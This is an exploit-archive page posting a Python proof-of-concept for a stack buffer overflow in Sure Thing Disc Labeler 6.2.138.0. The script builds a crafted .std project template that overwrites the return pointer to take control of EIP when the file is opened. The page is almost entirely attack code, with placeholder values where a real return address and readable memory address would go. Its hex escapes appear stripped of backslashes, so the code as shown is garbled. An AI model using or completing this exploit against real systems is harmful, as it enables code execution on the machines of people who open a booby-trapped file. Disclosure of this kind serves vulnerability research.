Home / os / winmobile

Sure Thing Disc Labeler 6.2.138.0 Buffer Overflow

Posted on 23 May 2017

# Exploit Title: Sure Thing Disc Labeler - Stack Buffer Overflow (PoC) # Date: 5-19-17 # Exploit Author: Chance Johnson (albatross@loftwing.net) # Vendor Homepage: http://www.surething.com/ # Software Link: http://www.surething.com/disclabeler # Version: 6.2.138.0 # Tested on: Windows 7 x64 / Windows 10 # # Usage: # Open the project template generated by this script. # If a readable address is placed in AVread, no exception will be thrown # and a return pointer will be overwritten giving control over EIP when # the function returns. header = 'x4Dx56x00xFFx0Cx00x12x00x32x41x61x33x08x00x5Ex00' header += 'x61x35x41x61x36x41x61x37x41x61x38x41x61x39x41x62' header += 'x30x41x62x31x41x62x32x41x62x33x41x62x34x41x62x35' header += 'x41x62x36x41x78x37x41x62x38x41x62x39x41x63x30x41' header += 'x0Cx00x41x63x78x1Fx00x00x41x63x34x41x63x35x41x63' junk1 = 'D'*10968 EIP = 'A'*4 # Direct RET overwrite junk2 = 'D'*24 AVread = 'B'*4 # address of any readable memory junk3 = 'D'*105693 buf = header + junk1 + EIP + junk2 + AVread + junk3 print "[+] Creating file with %d bytes..." % len(buf) f=open("exp.std",'wb') f.write(buf) f.close()

 

TOP